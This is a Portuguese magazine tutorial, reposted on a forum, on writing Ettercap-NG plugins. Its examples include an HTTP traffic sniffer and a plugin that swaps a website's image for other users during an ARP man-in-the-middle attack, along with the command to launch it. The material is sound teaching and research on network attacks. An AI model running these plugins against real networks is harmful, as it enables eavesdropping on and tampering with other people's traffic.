Exploit [Portugues] Writing ettercap plugins

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12932
Проверка EDB
  1. Пройдено
Автор
0UT0FBOUND
Тип уязвимости
PAPERS
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2009-04-14
Код:
[ --- The Bug! Magazine

                    _____ _              ___               _
                   /__   \ |__   ___    / __\_   _  __ _  / \
                     / /\/ '_ \ / _ \  /__\// | | |/ _` |/  /
                    / /  | | | |  __/ / \/  \ |_| | (_| /\_/
                    \/   |_| |_|\___| \_____/\__,_|\__, \/
                                                   |___/

                      [ M . A . G . A . Z . I . N . E ]


             [ Numero 0x03 <---> Edicao 0x01 <---> Artigo 0x05 ]


.> 01 de Maio de 2008,
.> The Bug! Magazine < staff [at] thebugmagazine [dot] org >


            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
              Desenvolvendo Plugins para o Ettercap-NG
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

.> Maycon Maia Vitali  < mayconmaia [at] yahoo [dot] com [dot] br >
                       < http://maycon.gsec.com.br >


[ --- Indice

+     1.     <---> Introducao
+     2.     <---> Bibliotecas necessarias
+     3.     <---> Registrando o Plugin e definido as rotinas de callback
+     4.     <---> Rotinas de leitura/escrita
+     5.     <---> Compilando e testando
+     6.     <---> Informacoes do globais
+     7.     <---> Macros pre-definidas
+     8.     <---> Aplicando hooks de protocolos
+     9.     <---> Trabalhando com Filter Engine
+     10.    <---> Caso de uso (plugin html_replace)
+     11.    <---> Conclusao



[ --- 1. Introducao

    Existem diversas ferramentas para se manipularem informacoes na rede. Desde
sniffers, passando por detectores e intrusos e ferramentas de ataque.
O Ettercap consiste em um programa capaz de juntar diversas funcionalidades de
seguranca de rede em uma unica ferramenta. Porem isto nao para por ai. O
Ettercap possui a capacidade de desenvolvimento de plugins, de maneira que suas
funcionalidades seja expandidas.

    Este texto descreve os passos necessarios e procura dar um ebasamento sobre
o processo de construcao de plugins para o Ettercap. Visto que nao pretendo
passar toda as funcoes fornecidas pela aplicacao. Qualquer duvida, consulte o
source. Digo o source, pois esta documentacao esta mais completa que a propria
documentacao do ettercao.


[ --- 2. Biblioteca necessarias

    #include <ec_plugins.h>

        Das dezenas de bibliotecas fornecidas pelo Ettercap, a unica realmente
    necessaria e a <ec_plugins.h>, pois ela fornece a estrutura plugin_ops
    utilizada para armazenar as informacoes e rotinas de callback do plugin e a
    propria rotina plugin_register() utilizada para registar um plugin junto ao
    Ettercap (Topico 3).

    #include <ec.h>

        Esta biblioteca nos fornece principalmente as informacoes globais do
    ambiente do Ettercap no instante em que o plugin esta sendo executado. Ela
    quem faz referencia as demais bibliotecas externas (como unistd.h) e alem
    disto ela possui uma diversidade de macros e definicoes para facilitar a
    escrita dos plugins. Algumas definicoes dos codigos das cores no padrao C
    ANSI (somente Linux e familia)

       EC_COLOR_END    
       EC_COLOR_BOLD   
       EC_COLOR_RED    
       EC_COLOR_YELLOW 
       EC_COLOR_GREEN  
       EC_COLOR_BLUE   
       EC_COLOR_CYAN  
            Codigos das cores no padrao C ANSI (Somente Linux e familia)

    #include <ec_hook.h>

        Se seu plugin necessita capturar pacotes da rede em algum protocolo
    especifico, esta biblioteca sera necessaria. Ela contem as implementacoes
    necessarias para se aplicar um hook (gancho) nas rotinas de captura de
    pacotes do motor principal do Ettercap, deixando o programador completamento
    livre de utilizar outras bibliotecas como 'libpcap'.

    #include <ec_packet.h>

        Esta biblioteca deve ser inserido quando e' necessario fazer a
    manipulacao de pacotes. Ela possui a estrutura utilizada como parametros nas
    rotinas registradas como gancho (hook) do sniffer do Ettercap. Esta
    estrutura e' a 'packet_object' e sera melhor detalhada no topico que fala
    de hook de protocolos.


[ --- 3. Registrando o Plugin e definido as rotinas de callback

        Se voce ja tiver alguma familiaridade em desenvolver LKM's ou Device
    Drivers, ja esta bastante familiarizado com o processo de registro de
    rotinas de callback.

        Todo plugin deve possuir uma funcao plugin_load, cuja sintaxe segue
    abaixo:

--------------------------------------------------------------------------------
    int plugin_load(void *handle) 
    {
       return 1;
    }
--------------------------------------------------------------------------------

        Esta funcao basicamente precisa registrar as rotinas de init e finish do
    plugin em desenvolvimento. A funcao citada e' a plugin_register() e ela
    possui dois parametros: o handle passado como parametro no plugin_load() e a
    estrutura 'plugin_ops' que armazena as informacoes do plugin.

        Segue a estrutura 'plugin_ops' com cada campo comentado:

--------------------------------------------------------------------------------
        struct plugin_ops dos_attack_ops = { 
           ettercap_version: EC_VERSION,
           name:             "cookie_sniffer",
           info:             "Pega os cookies do protocolo HTTP",
           version:          "1.0",
           init:             &cookie_sniffer_init,
           fini:             &cookie_sniffer_fini,
        };
--------------------------------------------------------------------------------

        ettercap_version: Contem uma estrutura com as informacoes da versao do
                          ettercap onde o plugin foi compilado. Para utilizar a
                          versao atual coloque a variavel global (em 'ec.h')
                          EC_VERSION que define a versao do ettercap.

        name:             Nome do plugin que aparecera quando pressionar a tecla
                          'p' no modo texto do ettercap e no menu plugin quando
                          estiver trabalhando com a interface grafica dele.

        info:             Uma cadeia de caractere que armazena as informacoes do
                          plugin. Este campo geralmente aparece junto com a
                          informacao 'name'.

        version:          A versao do seu plugin.

        init:             Rotina de callback que sera chamado quando seu plugin
                          for inicializado.


[ --- 4. Rotinas de leitura/escrita

        As vezes necessitamos escrever alguma coisa para o usuario ou
    simplesmente ler uma informacao do teclado. Poderiamos simplesmente utilizar
    as funcoes ja conhecidas como printf() scanf() e familia. Porem o ettercap
    possui alguns modos como quiet (que nao imprime muita informacao na tela) e
    ate' mesmo trabalha com interface grafica.

        Para resolver este impasso existe algumas funcoes definidas que abstrai
    o ambiente do usuario. Vejamos:

    USER_MSG() Envia uma mensagem para o usuario com a mesma sintaxe de um
               printf() porem necessita a autorizacao (nao quiet) do usuario
               ser impresso na tela no imediato momento em que ela foi chamada.

    INSTANT_USER_MSG() Semelhante a funcao anterior, porem a informacao e'
                       enviada imediatamento para o usuario.

    ui_input() Esta funcao e' utilizada para ler informacoes do usuario.
               Ela possui 4 parametros de acordo com a sintaxe abaixo:

--------------------------------------------------------------------------------
               void ui_input(

                   const char *title,     //- Titulo que sera impresso

                   char *input,           //- Variavel que sera lida

                   size_t n,              //- Tamanho da variavel lida

                   void (*callback)(void) //- Rotia que devera ser chamda com o
                                          //- buffer completo (utilizado para
                                          //- controle de logs
               )
--------------------------------------------------------------------------------

    Poderiamos ja ter um plugin funcional com o seguinte conteudo:

---[ ettercap_hello.c ]---------------------------------------------------------
/**
 * Plugin de exemplo para Ettercap.
 * Por Maycon Maia Vitali
 * Para tutorial de escrita de plugins para ettercal
 *
 * ( http://maycon.gsec.com.br )
 * (  [email protected]  )
 *
 */

#include <ec.h>
#include <ec_plugins.h>
#include <ec_hook.h>
#include <ec_packet.h>

int plugin_load(void *handle);
int func_init( void *dummy );
int func_fini( void *dummy );

struct plugin_ops hello_ops = {
    ettercap_version: EC_VERSION,
    name:             "hello_world",
    info:             "Hello World",
    version:          "0.0",
    init:             &func_init,
    fini:             &func_fini,
};

int plugin_load(void *handle) 
{
    return plugin_register(handle, &hello_ops);
}

char cNome[20];

int func_init( void *dummy ) {
    INSTANT_USER_MSG("Ola Mundo!\n");
    ui_input("Qual o seu nome? ", cNome, sizeof(cNome) - 1, NULL);
    INSTANT_USER_MSG("Ola %s :)\n", cNome);

    return PLUGIN_RUNNING;
}

int func_fini( void *dummy ) {
    INSTANT_USER_MSG("Tchau %s :(\n", cNome);
    return PLUGIN_FINISHED;
}

----------------------------------------------------------------------[ End ]---

    Uma coisa muito importante a falar e o fato das funcoes retornarem as
constantes predefinidas PLUGIN_RUNNING e PLUGIN_FINISHED. Para se ter uma ideia,
se nao tivessemos colocar o retorno PLUGIN_RUNNING na funcao de inicializacao o
plugin nao ficaria residente, ou seja, iniciaria e ja terminaria (sem executar a
funcao de finalizacao).


[ --- 5. Compilando e testando

    Os plugins do ettercap sao compilados como bibliotecas compartilhadas ( ou
shared libraries ), entao a compilacao nao possui nenhum parametro fora do
comum para estes aplicativos, somente a definicao de onde estao os arquivos de
bibliotecas do ettercap (-I).

    Para simplificar o trabalho, escrevi um Makefile simples para compilar nosso
exemplo ( ettercap_hello.c ), segue:

---[ Makefile ]-----------------------------------------------------------------
###
## Makefile para compilacao do plugin hello_world do ettercap
## Escrito por Maycon Maia Vitali para tutorial
##                                                 ( http://maycon.gsec.com.br )
##                                                 (  [email protected]  )
###

CC=/usr/bin/gcc
ETTERCAP_DIR=/home/noroot/b0x/codes/networking/ettercap-NG-0.7.3
GCC_LIBTOOL_PARAM=-pthread -rpath /usr/local/lib/ettercap -module -avoid-version

all:hello_world

hello_world:
	${CC} -DHAVE_CONFIG_H -fPIC -DPIC -I${ETTERCAP_DIR}/include -c \
	    -o hello_world.o hello_world.c
	${CC} -shared -pthread -Wl,-soname -Wl,ec_hello_world.o \
	    -o ec_hello_world.so hello_world.o
	${ETTERCAP_DIR}/libtool --mode=link gcc ${GCC_LIBTOOL_PARAM} \
	    -o ec_hello_world.la

install:
	cp ec_hello_world.so /usr/local/lib/ettercap/
	cp ec_hello_world.la /usr/local/lib/ettercap/

clean:
	rm -rf ec_hello_world.la hello_world.o ec_hello_world.so
----------------------------------------------------------------------[ End ]---

    Salve o Makefile no mesmo diretorio do plugin e em sequida execute 'make' e
como root 'make install'.

    O Makefile criado cria a biblioteca com os dois comandos executados inicial-
mente e em seguida utiliza um script fornecido com o ettercap para gerar um
arquivo ec_hello_world.la com as informacoes do plugin como nome da biblioteca,
versao, dependencias e alguns flags adicionais. Qualquer duvida edite o arquivo
ec_hello_world.la e veja seus comentarios.


    Bem, feito isto agora basta testar para saber se o plugin criado foi linkado
corretamente ao ettercap. *Foram removido dos logs algumas informacoes nao que
nao implicaria na explicacao do funcionamento):

---[ Shell Log ]----------------------------------------------------------------
hacklab # ettercap -Tq

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 ->       00:C0:9F:BA:BA:CA     192.168.254.1     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

   1 plugins
   
[ removido ]

Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

[ Pressione P ]

Available plugins :

[0]     hello_world  0.0  Hello World    <---- Nosso plugin


Plugin name (0 to quit): hello_world <-- Digite o nome dele
Activating hello_world plugin...

Ola Mundo!
Qual o seu nome? 0ut0fBound <-- Digite seu nome
Ola 0ut0fBound :)

[ Pressione P ]

Available plugins :

[1]     hello_world  0.0  Hello World


Plugin name (0 to quit): hello_world   <--- Digite novamente o nome do plugin
Deactivating hello_world plugin...

Tchau 0ut0fBound :(  <-- Funcao de termino dele

[ Pressione Q de 'quit' ]

Closing text interface...

Unified sniffing was stopped.

hacklab #
----------------------------------------------------------------------[ End ]---


   Agora que ja sabemos como escrever, compilar e testar plugins para o ettercap
podemos nos aventurar a fazer coisas interessante e plugins realmente uteis para
o cotidiano.


[ --- 6. Informacoes do globais

    Quando nossos plugins sao carregados, o ettercap dispoe de diversar
informacoes para nos auxiliar, como os parametros passados, a lista de hosts
encontradas (para main-in-the-middle), alguma regra do ambiente atual, etc.

    Essas definicoes estao contidas no arquivos ec_globals.h e todas elas estao
em uma estrutura enorme chamada 'globals'. Porem existe uma macro para cada uma
delas com o nome do formato GBL_*. Uma variavel global ja foi utilizada, no caso
a variavel GBL_VERSION que pega a versao atual do ettercap. Ela fui utilizada
para registro do nosso plugin na estrutura plugin_ops.

    Vejamos uma listagem de algumas variaveis e o que representam, sendo que
elas sao acessadas como GBL_OPTIONS->write:

    GBL_OPTIONS: Armazena as opcoes passadas como parametro no ettercap.
        char write:1 -> Se esta escrevendo em um arquivo pcap
        char read:1  -> Se esta lendo os pacotes de um arquivo pcap
        char quiet:1 -> Se esta em quiet mode (respeite essas regras)
        char mitm:1  -> Se foi feito man-in-the-middle com a opcao -M no
                        ettercap
        char *pcapfile_in  -> Arquivo *.pcap de onde esta lendo o trafego
        char *pcapfile_out -> Arquivo *.pcap aonde esta sendo gravado o trafego

    GBL_HOSTLIST: Armazena a lista de hosts que esta no ambiente do ettercap.
                  Esta lista de hosts e' obtida quando e' passado algum alvo
                  para o ettercap. Este hostliste e' uma lista encadeada que
                  sera facilmente manipulavel por algumas macros pre-definidas
                  (proxima sessao).
                  Cada item da lista possui a seguinte estrutura:

--------------------------------------------------------------------------------
                    /* scanned hosts list */
                    struct hosts_list {
                        struct ip_addr ip;            // Endereco IP
                        u_char mac[MEDIA_ADDR_LEN];   // Endereco MAC
                        char *hostname;               // Hostname
                        LIST_ENTRY(hosts_list) next;  // Proximo
                    };
--------------------------------------------------------------------------------

    Alem destas variaveis, diversas outras sao fornecidas, qualquer duvida
consulte o arquivo ec_globals.h que possui todas as variaveis comentadas.


[ --- 7. Macros pre-definidas

    Diversas macros sao definidas para auxiliar a escrita de plugins, nesta
sessao vamos ver algumas delas, porem isso nao inibe o leitor a ler os arquivos
de include do ettercap e analizar as demais macros.

    Macros de alocacao de memoria:
    	SAFE_CALLOC(x, n, s): semalhante a funcao calloc()
    	SAFE_REALLOC(x, s): semelhante a funcao realoc()
    	SAFE_FREE(x): semelhante a funcao free()

    Macro para tratamento de bits (utilizado muito nas flags):
    	BIT_SET(r,b): Seta o bit b de r
    	BIT_RESET(r,b): Reseta o bit b de r
    	BIT_TEST(r,b): Testa se o bit b de r esta ativo, retornando verdadeiro
    	BIT_NOT(r,b): Inverte o bit b de r

    Macros min/man:
    	MIN(a,b): Retorna o menor valor entre a e b.
    	MAX(a,b): Retorna o maior valor entre a e b.

    Operacoes para listas simplesmente-encadeadas (Singly-Linked List):
    	SLIST_FIRST(head): Retorna o primeiro elemento da lista
    	SLIST_END(head): Retorna o finalizador de lista (NULL)
    	SLIST_EMPTY(head): Verifica se a lista esta vazia
    	SLIST_NEXT(head,field): Retorna o proximo elemento da lista do tipo
            field
    	SLIST_FOREACH(var,head,field): cria um repeticao retornando sempre o 
            proximo campo do tipo field da lista head em var.
    	SLIST_INSERT_HEAD(head, elm, field): Insere o registrp elm do tipo field
            no inicio da lista head
        SLIST_REMOVE_HEAD(head,field): Remove o primeiro registro (field) da
            lista head.

    Esta sao apenas algumas das diversas macros fornecidas pelo ettercap, as
demais macros que trabalham com listas podem ser obtidas no arquivo ec_queue.h.
Nos demais arquivos ainda possui outras macros bastante interessantes. Se formos
utilizar alguma no decorrer do restante do texto sera explicada sua
funcionalidade.


[ --- 8. Aplicando hooks de protocolos

    De nada adiantaria criar plugins para o ettercap se nao conseguissemos
capturar e manipular as informacoes trafegadas pela rede. O ettercap possui
diversas listas de rotinas de tratamento dos protocolos. Estas listas estao
ligadas entre si em alguma caracteristica em comum como um protocolo ou uma
camada especifica.

    O ettercap nos fornece duas funcoes que nos permite adicionar itens nesta
lista de rotinas, de maneira que possamos registar funcoes em nosso plugins que
serao chamadas com as informacoes de uma pacote (protocolo, frame, etc)
especifico.

    Estas funcoes sao hood_add() e hood_del() com os seguintes prototipos:
--------------------------------------------------------------------------------
        void hood_add(
            int point,
            void (*func)(struct packet_object *po)
        );

        int hood_del(
            int point,
            void (*func)(struct packet_object *po)
        ):
--------------------------------------------------------------------------------

    O parametro point indica em que ponto dos protocolos estamos querendo fazer
o hook, ou seja, e' uma definicao em ec_hook.h que determina em qual lista nossa
funcao sera adicionada.

    Algumas definicoes para o parametro point sao:

    	- HOOK_RECEIVED: O pacote puro (raw packet)

    	- HOOK_PACKET_ARP: Pacotes ARP (Address Resolution Protocol)
    	- HOOK_PACKET_IP : Pacotes IP (Internet Protocol)
    	- HOOK_PACKET_TCP: Pacotes TCP (Transmision Control Protocol)
    	- HOOK_PACKET_UDP: Pacotes UDP (User Datagram Protocol)

    	- HOOK_PROTO_DNS : Hook no protocolo DNS
    	- HOOK_PROTO_HTTP: Hook no protocolo HTTP

    O parametro (*func)(struct packet_object *po) define qual funcao nossa sera
utilizada no hook, dentro dela a necessidade de possuir um parametro com um
ponteiro para uma estrutura do tipo packet_object. A estrutura packet_object
armazena todas as informacoes do pacote atual como as 4 camadas: Eth em L2,
IP em L3, TCP em L4 e aplicacao em DATA, ou seja, se quizermos saber a porta de
destino do pacote recebido basta acessar *po->L4.dst e se quizermos acessar as
informacoes passadas na camada de aplicacao devemos acessar *po->DATA.data. Para
uma visao mais detalhada da estrutura packet_object veja ela no arquivo
ec_packet.h no diretorio include do ettercap.

    Para testes vamos pegar nosso plugin de hello_world e iremos criar um plugin
de http_sniffer, criando um hook no protocolo HTTP e imprimindo todos os dados
que forem passados para nossa funcao.

    Veja o codigo exemplo:

---[ http_sniff.c ]-------------------------------------------------------------
/**
 * Plugin de exemplo para Ettercap que captura os dados HTTP
 * Por Maycon Maia Vitali
 * Para tutorial de escrita de plugins para ettercap
 *
 * ( http://maycon.gsec.com.br )
 * (  [email protected]  )
 *
 */

#include <ec.h>
#include <ec_plugins.h>
#include <ec_hook.h>
#include <ec_packet.h>

// Prototipos
int plugin_load(void *handle);
int http_sniff_init( void *dummy );
int http_sniff_fini( void *dummy );
void sniff_http(struct packet_object *po);

/**
 * Estrutura de registro do plugin
 */
struct plugin_ops http_sniff_ops = {
    ettercap_version: EC_VERSION,
    name:             "http_sniff",
    info:             "Simples Sniffer HTTP",
    version:          "0.1",
    init:             &http_sniff_init,
    fini:             &http_sniff_fini,
};

/**
 * Funcao de inicializacao
 */
int plugin_load(void *handle) 
{
    //- Registra nosso plugin
    return plugin_register(handle, &http_sniff_ops);
}

/**
 * Funcao de callback de inicializacao do plugin
 */
int http_sniff_init( void *dummy )
{
    //- Aplica o hook no protocolo HTTP
    hook_add(HOOK_PROTO_HTTP, &sniff_http);

    //- Informa ao usuario da inicializacao do plugin
    INSTANT_USER_MSG("[+] Sniffer HTTP inicializado.\n");

    //- Mantem o plugin resident
    return PLUGIN_RUNNING;
}

/**
 * Funcao de callback de finalizacao do plugin
 */
int http_sniff_fini( void *dummy )
{
    //- Deleta o hook registrado
    hook_del(HOOK_PROTO_HTTP, &sniff_http);

    //- Avisa ao usuario que o plugin foi desativado
    INSTANT_USER_MSG("[+] Sniffer HTTP finalizado.\n");

    //- Finaliza o plugin
    return PLUGIN_FINISHED;
}

/**
 * Rotina utilizada no hook do protocolo HTTP
 */
void sniff_http(struct packet_object *po) {
    //- Imprime as informacoes do protocolo HTTP
    INSTANT_USER_MSG("%s", po->DATA.data);
    INSTANT_USER_MSG("------------------------------------------------\n");
}

----------------------------------------------------------------------[ End ]---


    E segue o Makefile para sua compilacao e instalacao, no mesmo padrao que o
plugin hello_world


---[ Makefile ]-----------------------------------------------------------------
###
## Makefile para compilacao do plugin http_sniff do ettercap
## Escrito por Maycon Maia Vitali para tutorial
##                                                 ( http://maycon.gsec.com.br )
##                                                 (  [email protected]  )
###

CC=/usr/bin/gcc
ETTERCAP_DIR=/home/noroot/b0x/codes/networking/ettercap-NG-0.7.3
GCC_LIBTOOL_PARAM=-pthread -rpath /usr/local/lib/ettercap -module -avoid-version

all:http_sniff

http_sniff:
	${CC} -DHAVE_CONFIG_H -fPIC -DPIC -I${ETTERCAP_DIR}/include -c \
	    -o http_sniff.o http_sniff.c
	${CC} -shared -pthread -Wl,-soname -Wl,ec_http_sniff.o \
	    -o ec_http_sniff.so http_sniff.o
	${ETTERCAP_DIR}/libtool --mode=link gcc ${GCC_LIBTOOL_PARAM} \
	    -o ec_http_sniff.la

install:
	cp ec_http_sniff.so /usr/local/lib/ettercap/
	cp ec_http_sniff.la /usr/local/lib/ettercap/

clean:
	rm -rf ec_http_sniff.la http_sniff.o ec_http_sniff.so
----------------------------------------------------------------------[ End ]---

    Uma coisa muito importante a ressaltar esta no fato de cada pacote ter um
campo de flags e, um dos flags mais importantes set o PO_MODIFIED que deve ser
setado caso seja alterado alguma informacao no pacote, isto para que o proprio
ettercap recalcule o checksum das camadas que o necessitam para, em seguida
retransmitir para o destino ( no caso de man-in-the-middle ):

--------------------------------------------------------------------------------
    po->flags =| PO_MODIFIED;
--------------------------------------------------------------------------------


[ --- 9. Trabalhando com Filter Engine

    O ettercap possui um recurso muito interessante chamado de filters. Este
recurso consiste em um conjunto de operacoes que podem ser aplicada a um
determinado pacote. Dentre estas informacoes temos a execucao de funcoes como
FFUNC_REPLACE, FFUNC_SEARCH, FFUNC_INJECT, FFUNC_DROP, etc. Temos tambem
operacoes de testes como FTEST_EQ(=), FTEST_NEQ(!=), FTEST_LT(<), FTEST_GT(>),
FTEST_LEQ(<=) e FTEST_GEQ(>=).

    As funcoes da Filter Engine sao chamadas atravez da funcao filter_engine():

        int filter_engine(struct filter_op *fop, struct packet_object *po);

    A variavel struct packet_object deve ser o pacote passado como parametro
para algumas das funcoes de hook e a estrutura filter_op consiste em um vetor
com a seguinte estrutura:

--------------------------------------------------------------------------------
    struct filter_op {
        char opcode;

        /*
            * the first two field of the structs (op and level) must
            * overlap the same memory region. it is abused in ef_encode.c
            * encoding a function that uses an offset as an argument
            */
        union {
            /* functions */
            struct {
                char op;
                u_int8 level; 
                u_int8 *string;
                size_t slen;
                u_int8 *replace;
                size_t rlen;
                struct regex_opt *ropt;
            } func;

            /* tests */
            struct {
                u_int8   op;
                u_int8   level;
                u_int8   size;
                u_int16  offset;
                u_int32  value;
                u_int8   *string;
                size_t   slen;
            } test, assign;

            /* jumps */
            u_int16 jmp;

        } op;
    };
--------------------------------------------------------------------------------

    O importante ressaltar e que, de acordo com o opcode passado, os parametros
da operacao devem estar na respectiva estrutura das 'unions'.

    Um exemplo comumente utilizado seria a funcao REPLACE para substituir algum
conteudo dos dados, no casso do protocolo HTTP, substituir alguma coisa no HTML.

    Como o parametro filter_op passado pela funcao filter_engine() consiste em
um vetor, ele precisa ser finalizado. Ao inves de finaliza-lo como de costume
como vetores em C, este vetor deve ser finalizado com a operacao FOP_EXIT.

    Um exemplo de um vetor do tipo filter_op para substituir o texto Google por
Googl3 seria:

--------------------------------------------------------------------------------
    char replace_from[] = "Google";
    char replace_top[] = "Googl3";

    struct filter_op fop[] = {{
        // aplica um replace em DATA->data
        opcode : FOP_FUNC,
        op : {
            func: {
                op      : FFUNC_REPLACE,
                string  : replace_from,
                slen    : strlen(replace_from),
                replace : replace_to,
                rlen    : strlen(replace_to)
            }
        }
    },
    {
        //- Fim das opecacoes
        opcode: FOP_EXIT
    }};

    filter_engine(&fop, po);
--------------------------------------------------------------------------------

    Se voce entrar na pagina do google com esse plugin carregado as palavras
google nao serao substituidas, isto porque a pagina vem com chunked gzip, ou
seja, compactada. Para funcionar corretamente, seria necessario desenvolver ou
pegar pronto um decoder. Nao tenho certesa se o ettercap ja possui esta
implementacao, qualquer duvida 'look the code'. Uma outra alternativa seria
alterar o pacote enviado substituindo o cabecalho e forcando o servidor a nao
nos enviar compactado.


[ --- 10. Caso de uso (plugin html_replace)

    Como escrevi este artigo inicialmente para a The Bug Magazine!, nada melhor
do que fazer uma 'brincadeira'.

    Existe uma ferramenta chamada airpwn que substitui as imagens de uma pagina
por alguma imagem definida. Tinha alguns espertinhos brincando com essa
ferramenta no III H2HC, me lembro da pagina da rfdslabs ownada localmente pelas
frases VUGO.

    Escrevi um plugin que sobrescreve uma imagem especificada por outra imagem
qualquer ( no caso a do chucky ). Segue seu codigo completo:

---[ hack_tbm.c ]---------------------------------------------------------------
/**
 * Plugin de exemplo para Ettercap que substitui uma informacao no HTML
 * Por Maycon Maia Vitali
 * Para tutorial de escrita de plugins para ettercap
 * Greetz: hophet / Sandimas / The Bug Magazine!
 *
 * ( http://maycon.gsec.com.br )
 * (  [email protected]  )
 *
 */

#include <ec.h>
#include <ec_plugins.h>
#include <ec_hook.h>
#include <ec_packet.h>
#include <ec_filter.h>

// Prototipos
int plugin_load(void *handle);
int hack_tbm_init( void *dummy );
int hack_tbm_fini( void *dummy );
void sniff_http(struct packet_object *po);

/**
 * Estrutura de registro do plugin
 */
struct plugin_ops hack_tbm_ops = {
    ettercap_version: EC_VERSION,
    name:             "hack_tbm",
    info:             "Simples Replace em HTTP (Hack The Bug Magazine!)",
    version:          "0.1",
    init:             &hack_tbm_init,
    fini:             &hack_tbm_fini,
};

/**
 * Funcao de inicializacao
 */
int plugin_load(void *handle) 
{
    //- Registra nosso plugin
    return plugin_register(handle, &hack_tbm_ops);
}

/**
 * Funcao de callback de inicializacao do plugin
 */
int hack_tbm_init( void *dummy )
{
    //- Aplica o hook no protocolo HTTP
    hook_add(HOOK_PROTO_HTTP, &sniff_http);

    //- Informa ao usuario da inicializacao do plugin
    INSTANT_USER_MSG("Plugin inicializado\n");

    //- Mantem o plugin residente
    return PLUGIN_RUNNING;
}

/**
 * Funcao de callback de finalizacao do plugin
 */
int hack_tbm_fini( void *dummy )
{
    //- Deleta o hook registrado
    hook_del(HOOK_PROTO_HTTP, &sniff_http);

    //- Avisa ao usuario que o plugin foi desativado
    INSTANT_USER_MSG("Plugin finalizado.\n");

    //- Finaliza o plugin
    return PLUGIN_FINISHED;
}

/**
 * Rotina utilizada no hook do protocolo HTTP
 */
void sniff_http(struct packet_object *po) {
    char replace_from[] = "images/index-thebug.jpg";
    char *replace_to = "http://www.sfondideldesktop.com/"
                       "Images-Movies/Chucky/Chucky-0002/Chucky-0002.jpg";

    //- Operacoes do Filter Enginer
    struct filter_op fop[] = {{
        // aplica um replace em DATA->data
        opcode : FOP_FUNC,
        op : {
            func: {
                op      : FFUNC_REPLACE,
                string  : replace_from,
                slen    : strlen(replace_from),
                replace : replace_to,
                rlen    : strlen(replace_to)
            }
        }
    },
    {
        //- Fim das opecacoes
        opcode: FOP_EXIT
    }};

    //- Substituindo se encontrou
    if ((po->DATA.data, "images/business.gif") != NULL) {
            filter_engine(&fop, po);
    }
}


----------------------------------------------------------------------[ End ]---

    E o respectivo Makefile:

---[ Makefile ]-----------------------------------------------------------------
###
## Makefile para compilacao do plugin hack_tbm do ettercap
## Escrito por Maycon Maia Vitali para tutorial
##                                                 ( http://maycon.gsec.com.br )
##                                                 (  [email protected]  )
###

CC=/usr/bin/gcc
ETTERCAP_DIR=/home/noroot/b0x/codes/networking/ettercap-NG-0.7.3
GCC_LIBTOOL_PARAM=-pthread -rpath /usr/local/lib/ettercap -module -avoid-version

all:hack_tbm

hack_tbm:
	${CC} -DHAVE_CONFIG_H -fPIC -DPIC -I${ETTERCAP_DIR}/include -c \
	    -o hack_tbm.o hack_tbm.c
	${CC} -shared -pthread -Wl,-soname -Wl,ec_hack_tbm.o \
	    -o ec_hack_tbm.so hack_tbm.o
	${ETTERCAP_DIR}/libtool --mode=link gcc ${GCC_LIBTOOL_PARAM} \
	    -o ec_hack_tbm.la

install:
	cp ec_hack_tbm.so /usr/local/lib/ettercap/
	cp ec_hack_tbm.la /usr/local/lib/ettercap/

uninstall:
	rm -rf /usr/local/lib/ettercap/ec_hack_tbm.so
	rm -rf /usr/local/lib/ettercap/ec_hack_tbm.la

clean:
	rm -rf ec_hack_tbm.la hack_tbm.o ec_hack_tbm.so

--------------------------------------------------------------------------------


    Para testar digite:
    $ make

    E com root:
    # make install

    Em seguinte inicie o ettercap fazendo main-in-the-middle e ativante o
plugin:
    # ettercap -Tq -M arp -P hack_tbm //

    E para ver o resultado acessem http://www.thebugmagazine.org de outra
maquina na mesma rede ( nao quer fazer man-in-the-middle em voce mesmo! ).
Assim poderia ver o plugin em funcionamento.



[ --- 11. Conclusao

    Este e o primeiro texto que escrevo sem o auxilio de outros, creio que nao
encontrara nenhum material tao completo de escrita de plugins para o ettercap,
visto que a propria documentacao do /doc nao abrange tao claramente isto.

    Gostaria de lembrar que este texto nao demostrou todos os aspectos e muito
menos explorou todas as funcionalidades do ettercap, ele ainda pode gerar
pacotes, utilizar PCRE (Perl Compatible Regular Expressions) no 'Filter Enginer'
entre outras coisas.

    Nao se esqueca: Qualquer duvida, look the code!

# milw0rm.com [2009-04-14]
 
Источник
www.exploit-db.com

Похожие темы